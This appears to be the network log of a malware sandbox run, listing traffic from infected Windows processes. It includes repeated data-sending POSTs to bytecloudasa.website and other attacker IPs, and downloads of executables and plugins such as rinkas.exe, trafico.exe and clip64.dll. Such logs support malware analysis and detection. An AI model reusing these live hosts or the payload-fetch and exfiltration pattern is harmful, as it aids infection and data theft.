Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Zht%2F3f1cIBfJU2VtB89uG%2BAW2BzDUz3PeJ1PcWPyUA730GCvaLuzJc38o65voSoWTDjz2CQWYl%2F%2BRQ2rA04rS9qjG8Drgqmjec2ii7zyfGulKah6XFFL9x6DMTHr2%2Bxw1PeR8748Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5ef6d7f06d8-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:36:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=f06cih3ttvhfp9je1nqf0d4vk0; expires=Sun, 04 Feb 2024 02:22:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:36:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eAjJuNGhBHHZDXRRsX7abc7xbKjKor9arX%2FbtxeUzeHIPZD0oKDOj5sSWGT1unmdXImwsveeBR%2Bg1Bz3fu%2B%2BNNdHN6rAo5RRB52vnEjVTJfHIzUDi3lVZTkZ1StnOz6RFu%2BgMqw%2FSg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5f23f7a66eb-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:36:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=6h6n8kordhtf72l3hhi0eto14a; expires=Sun, 04 Feb 2024 02:22:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:36:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fMezqLyMwH0TJeUPTVUI5u1zil2Xjw7xZaHFw%2BVV1nutTvxyaK4qtDkkkLUPnDbK3K7vAqa5YTxxxE%2F%2BEQWKR%2BN0hQnRLBMmnmjJ4twhTMCHmNk7qGyrSLSthCHM%2FVvg8%2FV5OhECHw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5f4f9a666b4-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:36:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=par99crba6akdfqleim34shucv; expires=Sun, 04 Feb 2024 02:22:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:36:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RaTSIGcXpbZELsseaatbUnIU16Gf7miwGHGaYyfV9Q07eylpjxQdrxXXrJo6Xui2ZoHSwMoNHovHBJGeuZS%2B2a5IP99RZqhSyImOsK2trPSWdfhEDbfFoHQSLI0FHy3KptAJuGzYQA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5f62902b8a9-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:36:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=k963iah992hg8asvhmrj20brbk; expires=Sun, 04 Feb 2024 02:22:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:36:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OtHozhYTAu2VrFsnR5%2FtjTwiTpxGAQ2pvjFi7uHKgQAidCgBqfvCxrRPfbIzidElDNAxHrt1x%2F7mKetB0hB8D3ceWMdcPhGR2UMWwmL0WOQAIaYJ83DUyxdKqpw4%2FMC4qUCOHIZ5gQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5f75ed56723-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:36:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=p92lhfjoa1s2vi2cm9us9qqd62; expires=Sun, 04 Feb 2024 02:22:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:36:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SgpBLyjX6N88MNAwlD%2BEOcZ9dGXm%2FChkqNhx4yY8aGUZCk468y4m94MpyiBX2eoZDi%2BjZ%2B7zE5BSp1JuhuPZpmsG3v3ChbgsrnWwIwIhQ2QQAs2djj97Sg8MOL0bIa%2FtlXAKcrvt4g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5f839d50a69-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=LN4vJkrH9W1pJroySKAvenCrt3NTL7lAdQUi19mWJN0-1697013329-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 390550
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 08:36:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=flri6q9lsoskfcdtpa10tklfs0; expires=Sun, 04 Feb 2024 02:22:44 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 08:36:05 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uWw2VNNeXzM7%2FglxoROTdhccqlB1TFw1gJD8pcxajKkiTz2ApTmPlC6bN7M2S6AORY8HCXFVS0mV9xYzfuZRgDscv72vYLDmG%2BTD%2FGlPqyEwoPU2HVxgYuaJlLbpj%2Fj%2BO%2FYWSlz05g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8145c5fb081bd0c5-AMS
DNS

f122b745-a3e3-4679-956b-c3d53ceb1cf2.uuid.cdntokiog.studio

Remote address:

8.8.8.8:53

Request

f122b745-a3e3-4679-956b-c3d53ceb1cf2.uuid.cdntokiog.studio

IN TXT

Response

77.91.124.55:19071

AppLaunch.exe

260 B
5
157.240.201.35:443

www.facebook.com

tls

msedge.exe

26.3kB
358.5kB
183
294
142.250.179.141:443

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcQiayO93EaFRSgk19TougBBUNAEUeCkIuZKp2BcH7nlb_rI4OQOcxns_UQVA6Wcc-3hLPWfQ

tls, http2

msedge.exe

2.7kB
10.2kB
21
27

HTTP Request

GET https://accounts.google.com/

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcQiayO93EaFRSgk19TougBBUNAEUeCkIuZKp2BcH7nlb_rI4OQOcxns_UQVA6Wcc-3hLPWfQ
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

839 B
2.6kB
7
5
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

839 B
2.6kB
7
5
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

793 B
2.6kB
6
4
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

793 B
2.6kB
6
4
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

839 B
2.6kB
7
5
157.240.231.1:443

static.xx.fbcdn.net

tls

msedge.exe

24.9kB
675.1kB
395
590
157.240.231.35:443

fbcdn.net

tls

msedge.exe

2.3kB
5.8kB
20
21
142.251.36.14:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

msedge.exe

1.7kB
8.5kB
14
16

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

108.5kB
2.6MB
1780
1886

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
5.42.65.80:80

http://5.42.65.80/rinkas.exe

http

Explorer.EXE

337.3kB
16.4MB
6661
12233

HTTP Request

GET http://5.42.65.80/rinkas.exe

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
5.42.92.211:80

http://5.42.92.211/loghub/master

http

AppLaunch.exe

748 B
436 B
6
4

HTTP Request

POST http://5.42.92.211/loghub/master

HTTP Response

200
77.91.124.55:19071

2yq462Ma.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

16.9kB
295.8kB
226
232

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
185.216.70.222:80

http://185.216.70.222/trafico.exe

http

Explorer.EXE

9.4kB
452.7kB
184
328

HTTP Request

GET http://185.216.70.222/trafico.exe

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
85.209.176.171:80

http://85.209.176.171/

http

DA47.exe

14.1MB
221.9kB
10125
4454

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200
172.67.34.170:443

https://pastebin.com/raw/8baCJyMF

tls, http

D40C.exe

772 B
3.6kB
9
7

HTTP Request

GET https://pastebin.com/raw/8baCJyMF

HTTP Response

200
95.217.246.182:8443

tak.soydet.top

D40C.exe

5.3MB
73.6kB
3890
1558
77.91.124.55:19071

2yq462Ma.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5
104.26.13.31:443

https://api.ip.sb/geoip

tls, http

DA47.exe

713 B
4.1kB
8
7

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.7kB
6.9kB
11
11

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.3kB
18.3kB
19
17

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

3.7kB
94.8kB
74
73

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

30.2kB
1.7kB
26
14

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
194.169.175.127:80

http://host-host-file8.com/

http

Explorer.EXE

693 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

2yq462Ma.exe

260 B
5
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301360_1Q2LDLW388L48JF4Q&pid=21.2&w=1080&h=1920&c=4

tls, http2

97.1kB
2.9MB
2085
2080

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301312_1T9ZATUOGPW0HJ7P7&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300927_1MHQY2TQNUIH7ZQRL&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301721_1Y64UM4ZK2VT4MVP3&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301319_135UX7GSFYCP6UCBA&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301728_1S5SOTBKRSIDGRZ37&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301360_1Q2LDLW388L48JF4Q&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

17.6kB
1.8kB
18
16

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

18.6kB
1.7kB
18
13

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.8kB
1.4kB
7
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

2yq462Ma.exe

260 B
5
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

402.7kB
5.6kB
293
111

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

104 B
2

8.8.8.8:53

20.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

20.160.190.20.in-addr.arpa
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

121.208.253.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

121.208.253.8.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

208.194.73.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

208.194.73.20.in-addr.arpa
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

217.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

217.135.221.88.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.201.35
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
142.250.179.141:443

accounts.google.com

https

msedge.exe

13.2kB
243.6kB
115
242
8.8.8.8:53

35.201.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.201.240.157.in-addr.arpa
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.231.1
8.8.8.8:53

1.231.240.157.in-addr.arpa

dns

72 B
116 B
1
1

DNS Request

1.231.240.157.in-addr.arpa
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

facebook.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.201.35
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
224.0.0.251:5353

msedge.exe

574 B
9
8.8.8.8:53

fbcdn.net

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.231.35
8.8.8.8:53

play.google.com

dns

msedge.exe

61 B
77 B
1
1

DNS Request

play.google.com

